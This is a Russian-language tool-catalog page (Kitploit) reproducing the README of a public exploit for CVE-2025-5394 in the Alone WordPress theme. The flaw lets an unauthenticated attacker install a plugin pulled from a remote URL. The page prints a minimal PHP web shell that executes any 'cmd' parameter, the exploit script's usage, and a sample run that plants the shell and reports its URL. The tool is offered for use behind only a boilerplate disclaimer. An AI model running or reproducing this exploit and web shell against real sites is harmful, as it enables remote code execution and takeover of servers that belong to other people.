Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5394 — Alone – Благотворительная многоцелевая некоммерческая тема WordPress <= 7.8.3 - Отсутствие авторизации, позволяющее неаутентифицированную произвольную загрузку файлов через установку плагина | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-5394
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-5394

CVE-2025-5394

Alone – Благотворительная многоцелевая некоммерческая тема WordPress <= 7.8.3 - Отсутствие авторизации, позволяющее неаутентифицированную произвольную загрузку файлов через установку плагина

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-5394 - Неавторизованная произвольная загрузка плагинов в теме Alone

📌 Затронутый продукт:

Alone – Charity Multipurpose Non-profit WordPress Theme   Версии: <= 7.8.3   CVE: CVE-2025-5394   Оценка CVSS: 9.8 (Critical)

🔥 Краткое описание уязвимости:

Тема Alone для WordPress уязвима к произвольной загрузке файлов из-за отсутствия проверки прав доступа в функции alone_import_pack_install_plugin().   Эта ошибка позволяет неавторизованным атакующим загружать ZIP-файлы (замаскированные под плагины) с удалённых серверов, что потенциально может привести к выполнению удалённого кода.


⚙️ Эксплойт-скрипт (Python)

Этот репозиторий содержит Python-скрипт, который автоматизирует эксплуатацию CVE-2025-5394.   Скрипт запускает уязвимое AJAX-действие и загружает поддельный плагин (содержащий веб-шелл) непосредственно на сервер WordPress.


📁 Требования к веб-шеллу:

Загружаемый ZIP-файл должен иметь следующую структуру:

root@kitploit:~
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

Где:

  • shell_plugin — каталог плагина.
  • shell_plugin.php — допустимый PHP-файл плагина с заголовком плагина.
  • PHP-файл может содержать полезную нагрузку веб-шелла.

Пример минимального заголовка плагина внутри shell_plugin.php:

root@kitploit:~
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 Пример использования:

root@kitploit:~
python3 CVE-2025-5394.py -help
root@kitploit:~
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ Пример успешного вывода:

root@kitploit:~
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ Отказ от ответственности:

Этот скрипт предоставлен только в образовательных и исследовательских целях.   Автор не несёт ответственности за любое неправомерное использование или незаконную деятельность, совершённую с помощью этого кода.   Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.


👨‍💻 Автор:

Nxploited ( Khaled Alenazi )   GitHub: https://github.com/Nxploited

Скачать инструмент